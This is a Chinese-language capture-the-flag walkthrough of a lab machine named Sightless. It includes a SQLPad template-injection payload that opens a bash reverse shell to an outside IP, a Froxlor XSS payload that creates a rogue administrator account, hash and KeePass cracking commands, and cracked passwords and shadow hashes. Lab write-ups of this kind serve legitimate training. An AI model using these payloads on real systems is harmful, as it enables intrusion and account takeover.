基本信息

端口扫描

21,22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
$ nmap -sC -sV -Pn 10.10.11.32
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-10 13:57 CST
Nmap scan report for 10.10.11.32
Host is up (0.093s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp
| fingerprint-strings:
|   GenericLines:
|     220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_  256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://sightless.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.95%I=7%D=9/10%Time=66DFDFFB%P=x86_64-apple-darwin23.4.0%
SF:r(GenericLines,A0,"220\x20ProFTPD\x20Server\x20\(sightless\.htb\x20FTP\
SF:x20Server\)\x20\[::ffff:10\.10\.11\.32\]\r\n500\x20Invalid\x20command:\
SF:x20try\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\x20tr
SF:y\x20being\x20more\x20creative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.23 seconds

80

需要加hosts:

1
10.10.11.32 sightless.htb

一个官网:

SQLPad

页面上几个服务,sqlpad是一个新的子域名,加入hosts:

1
sqlpad.sightless.htb

一个在线数据库连接管理工具:

测试功能没发现什么

SSTI

搜索可以发现一个漏洞:

利用打到容器内root:

1
{{ process.mainModule.require('child_process').exec('/bin/bash -c "bash -i >& /dev/tcp/10.10.14.17/4444 0>&1"') }}

michael & user flag

查看容器内信息发现非标准的michael用户,shadow对应的hash可破解:

1
2
3
4
5
michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:19860:0:99999:7:::

sudo hashcat -m 1800 hash.txt ~/Tools/dict/rockyou.txt

insaneclownposse

然后michael用户ssh登录宿主机,得到user flag:

froxlor

查看端口发现本地的8080,转发出来查看:

1
ssh michael@10.10.11.32 -L 8081:127.0.0.1:8080

是一个froxlor:

非预期

这里非预期方式可以通过browser debugger,因为预期方式是XSS,模拟了管理员定期登录

预期 xss

搜索可以找到这个:

修改payload改下地址用户名之类的,提交等待触发,然后用我们的用户登录:

xss payload

1
admin{{$emit.constructor`function+b(){var+metaTag%3ddocument.querySelector('meta[name%3d"csrf-token"]')%3bvar+csrfToken%3dmetaTag.getAttribute('content')%3bvar+xhr%3dnew+XMLHttpRequest()%3bvar+url%3d"http%3a//admin.sightless.htb%3a8080/admin_admins.php"%3bvar+params%3d"new_loginname%3dmiao%26admin_password%3dMiao%40%401234%26admin_password_suggestion%3dmgphdKecOu%26def_language%3den%26api_allowed%3d0%26api_allowed%3d1%26name%3dMiao%26email%3dyldrmtest%40gmail.com%26custom_notes%3d%26custom_notes_show%3d0%26ipaddress%3d-1%26change_serversettings%3d0%26change_serversettings%3d1%26customers%3d0%26customers_ul%3d1%26customers_see_all%3d0%26customers_see_all%3d1%26domains%3d0%26domains_ul%3d1%26caneditphpsettings%3d0%26caneditphpsettings%3d1%26diskspace%3d0%26diskspace_ul%3d1%26traffic%3d0%26traffic_ul%3d1%26subdomains%3d0%26subdomains_ul%3d1%26emails%3d0%26emails_ul%3d1%26email_accounts%3d0%26email_accounts_ul%3d1%26email_forwarders%3d0%26email_forwarders_ul%3d1%26ftps%3d0%26ftps_ul%3d1%26mysqls%3d0%26mysqls_ul%3d1%26csrf_token%3d"%2bcsrfToken%2b"%26page%3dadmins%26action%3dadd%26send%3dsend"%3bxhr.open("POST",url,true)%3bxhr.setRequestHeader("Content-type","application/x-www-form-urlencoded")%3balert("Your+Froxlor+Application+has+been+completely+Hacked")%3bxhr.send(params)}%3ba%3db()`()}}

FTP

froxlor里可以修改web1的ftp密码:

然后登录FTP,得到一个keepass文件:

Database.kdb

常规破解出密码:

1
2
3
4
5
keepass2john Database.kdb > hash.txt

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

bulldogs

然后打开Database.kdb文件,得到root私钥和密码:

1
q6gnLTB74L132TMdFCpK

root flag

文件处理下格式,然后使用私钥ssh登录:

1
dos2unix root_id_rsa

shadow

1
2
root:$y$j9T$PScOTu/SFg7oaa/bfW4pL0$7oWEYAy0P18E3uDpsZUyoy78cubBKODqotqtAp4GtK0:19860:0:99999:7:::
michael:$y$j9T$VdjDEROmqIwhwxW5Mqie//$yo5dlS5BvDOm5r4snRGg6JQp2lK2Vip3mC5.A.e94S3:19860:0:99999:7:::

参考资料